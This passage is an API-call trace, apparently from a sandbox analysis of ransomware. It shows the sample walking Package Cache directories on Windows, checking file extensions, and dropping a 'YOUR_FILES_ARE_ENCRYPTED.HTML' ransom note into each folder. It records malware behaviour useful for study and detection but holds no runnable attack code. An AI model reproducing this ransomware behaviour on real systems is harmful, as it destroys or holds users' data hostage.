lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0108.559] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x681350, NumberOfConcurrentThreads=0x0) returned 0x274 [0108.559] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x681350, lpOverlapped=0x681350) returned 1 [0108.559] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb35c4d00, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb35c4d00, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb35c4d00, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0108.559] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.559] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0108.559] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0108.559] lstrlenW (lpString=".msi") returned 4 [0108.559] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0108.559] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb35c4d00, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb35c4d00, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb35c4d00, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0108.559] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0108.559] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0108.559] GetProcessHeap () returned 0x600000 [0108.559] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.560] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0108.566] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.567] CloseHandle (hObject=0x314) returned 1 [0108.567] GetProcessHeap () returned 0x600000 [0108.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.567] GetProcessHeap () returned 0x600000 [0108.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0108.568] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x45016665, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x45016665, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f12b0, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0108.568] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0108.568] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0108.568] GetProcessHeap () returned 0x600000 [0108.568] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.568] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0108.569] WriteFile (in: hFile=0x308, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.570] CloseHandle (hObject=0x308) returned 1 [0108.570] GetProcessHeap () returned 0x600000 [0108.570] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.570] GetProcessHeap () returned 0x600000 [0108.570] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.571] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fdd028, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0108.571] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0108.571] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0108.571] GetProcessHeap () returned 0x600000 [0108.571] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0108.572] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.572] WriteFile (in: hFile=0x30c, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.573] CloseHandle (hObject=0x30c) returned 1 [0108.573] GetProcessHeap () returned 0x600000 [0108.573] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0108.573] GetProcessHeap () returned 0x600000 [0108.573] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.574] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c86d4cb, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c893534, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c893534, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", cAlternateFileName="{3C3AA~1")) returned 1 [0108.575] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.575] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 71 [0108.575] GetProcessHeap () returned 0x600000 [0108.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0108.575] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0108.575] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*" [0108.575] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c86d4cb, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c893534, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c893534, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0108.576] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c86d4cb, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c893534, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c893534, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.576] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c893534, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c893534, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xa7a1fb75, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x27e, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0108.576] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.576] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 81 [0108.576] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0108.576] lstrlenW (lpString=".rsm") returned 4 [0108.576] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0108.576] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c86d4cb, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c86d4cb, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4ae0cc20, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0108.576] StrStrIW (lpFirst="vcredist_x64.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.576] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 88 [0108.576] PathFindExtensionW (pszPath="vcredist_x64.exe") returned=".exe" [0108.576] lstrlenW (lpString=".exe") returned 4 [0108.576] PathFindExtensionW (pszPath="vcredist_x64.exe") returned=".exe" [0108.576] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c86d4cb, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c86d4cb, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4ae0cc20, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0108.576] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0108.576] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0108.576] GetProcessHeap () returned 0x600000 [0108.576] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0108.577] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.580] WriteFile (in: hFile=0x30c, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.581] CloseHandle (hObject=0x30c) returned 1 [0108.581] GetProcessHeap () returned 0x600000 [0108.581] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0108.590] GetProcessHeap () returned 0x600000 [0108.590] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0108.591] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x64df9047, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{65e650ff-30be-469d-b63a-418d71ea1765}", cAlternateFileName="{65E65~1")) returned 1 [0108.591] StrStrIW (lpFirst="{65e650ff-30be-469d-b63a-418d71ea1765}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.591] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned 71 [0108.591] GetProcessHeap () returned 0x600000 [0108.591] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0108.591] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" [0108.592] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*" [0108.592] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x64df9047, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626878 [0108.592] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x64df9047, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.592] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaba9e611, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x320, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0108.592] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.592] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\state.rsm") returned 81 [0108.592] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0108.592] lstrlenW (lpString=".rsm") returned 4 [0108.592] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0108.592] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x625ed0ab, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x9e2e8, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0108.592] StrStrIW (lpFirst="VC_redist.x86.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.592] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\VC_redist.x86.exe") returned 89 [0108.592] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0108.592] lstrlenW (lpString=".exe") returned 4 [0108.592] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0108.592] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x625ed0ab, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x9e2e8, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0 [0108.592] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0108.593] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0108.593] GetProcessHeap () returned 0x600000 [0108.593] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0108.593] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.631] WriteFile (in: hFile=0x30c, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.632] CloseHandle (hObject=0x30c) returned 1 [0108.633] GetProcessHeap () returned 0x600000 [0108.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0108.633] GetProcessHeap () returned 0x600000 [0108.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0108.633] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69df918b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", cAlternateFileName="{6913E~1")) returned 1 [0108.633] StrStrIW (lpFirst="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.633] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}") returned 71 [0108.633] GetProcessHeap () returned 0x600000 [0108.633] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0108.634] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}" [0108.634] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\*" [0108.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69df918b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0108.635] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69df918b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.635] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xad482581, ftLastWriteTime.dwHighDateTime=0x1d705cc, 